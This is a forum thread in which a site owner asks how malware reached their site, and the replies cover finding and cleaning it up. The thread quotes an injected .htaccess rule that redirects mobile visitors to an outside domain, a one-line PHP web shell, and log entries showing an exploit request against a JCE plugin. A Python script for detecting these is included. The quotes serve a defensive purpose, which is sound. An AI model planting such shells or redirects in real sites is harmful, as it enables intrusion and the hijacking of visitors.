PHP
neopug, 2013-02-01 12:41:58

How do malware get to the site?

Good afternoon,
tell me how malware can get on the site?
Background - I received a letter from Yandex saying that my site may have been hacked. After a cursory analysis I found this rubbish in .htaccess:
    RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|iemobile|nokia|ucweb|ucbrowser) [NC]
    RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
    RewriteRule (.*) http://id.nice-dns.ru/?18&source=oda.ua [L,R=302] # on
My authentication is by keys, and the ssh port is non-standard. There are practically no third-party scripts (I confess there is Sape, but as I understand it, if it were the culprit, half of the Runet would have been screaming). A couple of months ago there was a similar situation, but back then ssh authentication was by login / password and the session was saved in WinSCP. I assumed they had simply stolen my password and planted the malware, but it looks like this comes from somewhere else.
Maybe there are some vulnerability scanners for reasonable money? Or is this some kind of hole? Because on New Year's Eve the same thing happened to polyana.ua/, with which I am connected only as a client.

5 answer(s)
@sledopit, 2013-02-01
@neopug

As a rule, such garbage gets in in two ways:
A. A hole in the site. It is found by diligently reading the logs and searching for shells.
Quite recently I helped a friend with a similar thing (iframes stuck onto the resource). The procedure was roughly this:

  1. Comparison with a backup and detection of changed / new files.
  2. Studying the new files; of course, one of them turned out to be a shell ( .cache_rcnzyz.php ).
    (If there are no backups, then it's your own fault; you have to search for the standard shell functions (in the case of php these are all sorts of shell_exec and base64 [bear in mind that your own code may use them too, so you need to look carefully]).)
  3. Studying the logs for accesses to this shell and for its upload. I had lines like this:
    xxx.xxx.xxx.xx - - [09/Jan/2013:18:09:46 +0400] "POST /images/stories/.cache_rcnzyz.php HTTP/1.0" 200 501 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"

    Unfortunately, the attacker turned out to be quite cautious and there were no other requests from this IP (which also turned out to be foreign, i.e. you won't be complaining to the valiant police). The hole was found by the file's creation time (+- a couple of minutes):
    zzz.zzz.zzz.zz - - [08/Jan/2013:00:02:21 +0400] "POST //index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.0" 200 668 "-" "BOT/0.1 (BOT for JCE)"
Hooray, the hole was found, the patch was applied, the attacker was banned.
B. A person with FTP access to the resource picked up a trojan (I have heard of this with ssh only once). Here you just change the passwords and clean the infected machine.

TyzhSysAdmin, 2013-02-01
@POS_troi

So you didn't initially mention that it's a VDS ;)
Still, look for shells in the php (or whatever you have there) scripts, something like
<?php system($_GET["cmd"]); ?>
but most likely everything will be wrapped in base64; as a rule they give themselves away immediately. You can check simply by comparing all files against the reference copy; on several servers I run a daily comparison of MD5 sums.
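The three checks described in the answers above (comparing files against a backup or MD5 baseline, grepping php for shell_exec/base64, and reading the access log for POSTs to a shell in an upload directory) as one added example script; this is not code from the thread. The log lines and the PHP snippets are constructed samples modelled on what was quoted.

```python
import hashlib
import re
from pathlib import Path

# Constructed access-log sample in the combined format quoted in the thread.
SAMPLE_LOG = """\
xxx.xxx.xxx.xx - - [09/Jan/2013:18:09:46 +0400] "POST /images/stories/.cache_rcnzyz.php HTTP/1.0" 200 501 "-" "Mozilla/5.0"
yyy.yyy.yyy.yy - - [09/Jan/2013:18:10:00 +0400] "GET /index.php?option=com_content HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
"""
# Constructed PHP samples: a plain shell and a base64-wrapped one ("QUJD" is just "ABC").
SAMPLE_PHP_PLAIN = '<?php system($_GET["cmd"]); ?>'
SAMPLE_PHP_WRAPPED = '<?php eval(base64_decode("QUJD")); ?>'

# Functions the answers suggest grepping for; legitimate code may use them too, so review hits by hand.
SUSPICIOUS = re.compile(r"\b(eval|system|shell_exec|passthru|exec|base64_decode)\s*\(", re.I)
# A POST to a .php file under an upload/cache directory is unusual for normal site traffic.
UPLOAD_POST = re.compile(r'"POST (/(?:images|uploads|cache|tmp)/\S*\.php)')


def md5_manifest(root):
    """Map relative path -> MD5 for every file under root (the reference copy or the live tree)."""
    root = Path(root)
    return {str(p.relative_to(root)): hashlib.md5(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}


def diff_manifest(baseline, current):
    """Return (new_files, changed_files) of the current manifest relative to the baseline."""
    new = sorted(set(current) - set(baseline))
    changed = sorted(p for p in current if p in baseline and baseline[p] != current[p])
    return new, changed


def scan_php_source(src):
    """Return the sorted set of suspicious function names called in a PHP source string."""
    return sorted({m.group(1).lower() for m in SUSPICIOUS.finditer(src)})


def suspicious_posts(log_text):
    """Return (client_ip, path) for every POST to a .php file inside an upload-style directory."""
    hits = []
    for line in log_text.splitlines():
        m = UPLOAD_POST.search(line)
        if m:
            hits.append((line.split()[0], m.group(1)))
    return hits


if __name__ == "__main__":
    print("plain shell calls:", scan_php_source(SAMPLE_PHP_PLAIN))
    print("wrapped shell calls:", scan_php_source(SAMPLE_PHP_WRAPPED))
    print("POSTs to php in upload dirs:", suspicious_posts(SAMPLE_LOG))
```

Run `md5_manifest()` once on the clean copy and store the result; a later run against the live tree, fed through `diff_manifest()`, lists exactly the new and changed files to inspect with `scan_php_source()`.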

TyzhSysAdmin, 2013-02-01
@POS_troi

It's not necessarily your account that was hacked; the whole server could have been compromised, giving them an administrative account.
Ideally, look at the server logs and find out how the file was changed.
At the same time, look for the embedded shell in all files.

pessom, 2013-02-01
@pessom

FTP up?

charliez, 2013-02-01
@charliez

The site engine isn't WordPress by any chance?
